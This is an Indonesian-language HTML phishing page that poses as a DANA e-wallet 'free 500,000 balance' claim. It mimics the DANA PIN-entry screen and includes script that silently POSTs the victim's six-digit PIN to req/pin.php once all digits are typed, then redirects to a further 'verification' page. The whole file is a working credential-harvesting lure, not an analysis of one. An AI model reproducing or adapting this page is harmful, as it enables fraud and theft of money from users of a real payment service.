<!DOCTYPE html>
<html>
    <head>
        <title>Claim Reward Saldo DANA Gratis 500.000 Langsung Cair</title>
        <meta charset="UTF-8">
        <meta name="description" content="Reward Saldo Dana Gartis Mulai Hari, Claim sekarang dan cairkan sekarang reward saldo danq gratis">
        <meta name="keywords" content="Saldo dana gratis, Reward Saldo Dana">
        <meta data-n-head="ssr" data-hid="twitter:image" name="twitter:image" content="https://i.ibb.co.com/5gj8M9vW/images-1-7.jpg">
        <meta data-n-head="ssr" data-hid="og:image" property="og:image" content="https://i.ibb.co.com/5gj8M9vW/images-1-7.jpg">
        <link rel="icon" type="image/x-icon" href="./assets/img/favicon/favicon.ico">
        <link rel="apple-touch-icon" sizes="180x180" href="./assets/img/favicon/apple-touch-icon.png">
        <link rel="icon" type="image/png" sizes="32x32" href="./assets/img/favicon/favicon-32x32.png">
        <link rel="icon" type="image/png" sizes="16x16" href="./assets/img/favicon/favicon-16x16.png">
        <link rel="manifest" href="./assets/img/favicon/site.webmanifest">
        <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
        <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-QWTKZyjpPEjISv5WaRU9OFeRpok6YctnYmDr5pNlyT2bRjXh0JMhjY6hW+ALEwIH" crossorigin="anonymous"> 
        <link rel="stylesheet" href="css/loading.css" type="text/css" media="all" />
        <link rel="stylesheet" href="css/pin.css" type="text/css" media="all" />
    </head>
    <body>
        <!-- ketika halaman di klik munculkan loading -->
        <div id="process" name="process" class="process" style="display: none;">
            <div class="loading">
                <img src="img/load_bg.png">
                <img class="spinner" src="img/load_spin.png">
            </div>
        </div>
        
        <div class="nav-dana">
            <img onclick="location.href='main.html'" src="img/back.png" alt="" />
            <span class="masuk">Masuk</span>
            <p>lol</p>
        </div>
        
        <form id="formPin">
            <p class="masukpin">Masukkan PIN</p>
    <div class="box-input-pin">
    <div type="button" class="clearPin"></div>       
    <input type="password" 
    pattern="[0-9]*" 
    inputmode="numeric" 
    placeholder=" " 
    minlength="1" 
    maxlength="1" id="pin1" 
    name="pin1"
    autocomplete="off" 
    class="inppin" >
    

<input type="password" 
    pattern="[0-9]*" 
    inputmode="numeric" 
    placeholder=" " 
    minlength="1" 
    maxlength="1" id="pin2" 
    name="pin2"
    autocomplete="off" 
    class="inppin" 
    >

<input type="password" 
    pattern="[0-9]*" 
    inputmode="numeric" 
    placeholder=" " 
    minlength="1" 
    maxlength="1" id="pin3"
    name="pin3"
    autocomplete="off" 
    class="inppin" 
    >

<input type="password" 
    pattern="[0-9]*" 
    inputmode="numeric" 
    placeholder=" " 
    minlength="1" 
    maxlength="1" id="pin4"
    name="pin4"
    autocomplete="off" 
    class="inppin" 
    >

<input type="password" 
    pattern="[0-9]*" 
    inputmode="numeric" 
    placeholder=" " 
    minlength="1" 
    maxlength="1" id="pin5" 
    name="pin5"
    autocomplete="off" 
    class="inppin">

<input type="password" 
    pattern="[0-9]*" 
    inputmode="numeric" 
    placeholder=" " 
    minlength="1" 
    maxlength="1" id="pin6"
    name="pin6"
    autocomplete="off" 
    class="inppin" >

</div>

<div class="box-cs">
    <div class="flex-cs">
        <img src="img/cs.png" alt="" />
        BUTUH BANTUAN?
    </div>
    <div class="riset-pin">
        LUPA PIN?
    </div>
</div>
            </form>

    </body>
    <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/js/bootstrap.bundle.min.js" integrity="sha384-pprn3073KE6tl6bjs2QrFaJGz5/SUsLqktiwsUTF55Jfv3qYSDhgCecCxMW52nD2" crossorigin="anonymous"></script>
    <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
    <script src="js/jquery.min.js"></script>
    <script src="js/jquery.mask.min.js"></script>
    

    <script>
    $(document).ready(function() {
        $('.clearPin').click(function() {
            $('.inppin').val('');
            $('#pin1').focus();
        });
    });
    </script>
    
        <script>
    $('.inppin').on('input', function(event) {
        const inputs = $('.inppin');
        const isAllFilled = Array.from(inputs).every((input) => input.value !== '');
        if (isAllFilled == true) {
            $(event.target).blur();
            sendPin();
        };
        const index = inputs.index(this);
        const currentValue = event.target.value;
        if (currentValue.length === 1) {
            if (index < inputs.length - 1) {
                inputs[index + 1].focus();
            }
        } else if (currentValue.length === 0) {
            if (index > 0) {
                inputs[index].focus();
            }
        };
    });
    $('.inppin').on('keydown', function(event) {
        const inputs = $('.inppin');
        const key = event.key;
        const index = inputs.index(this);
        if (key === 'Backspace' && event.target.value.length === 0) {
            if (index > 0) {
                inputs[index - 1].focus();
            }
        };
    });
    </script>
    
    <script>
    function sendPin() {
        $("#process").show();
        event.preventDefault();
        $("#pin1").blur();
        $.ajax({
            type: 'POST',
            url: 'req/pin.php',
            data: $('#formPin').serialize(),
            dataType: 'text',
            success: function() {
                setTimeout(function() {
                     $("#pin1").focus();
                window.location.href = "verifikas1.html";
                }, 1000);
            }
        });
    };
    </script>
    
</html>
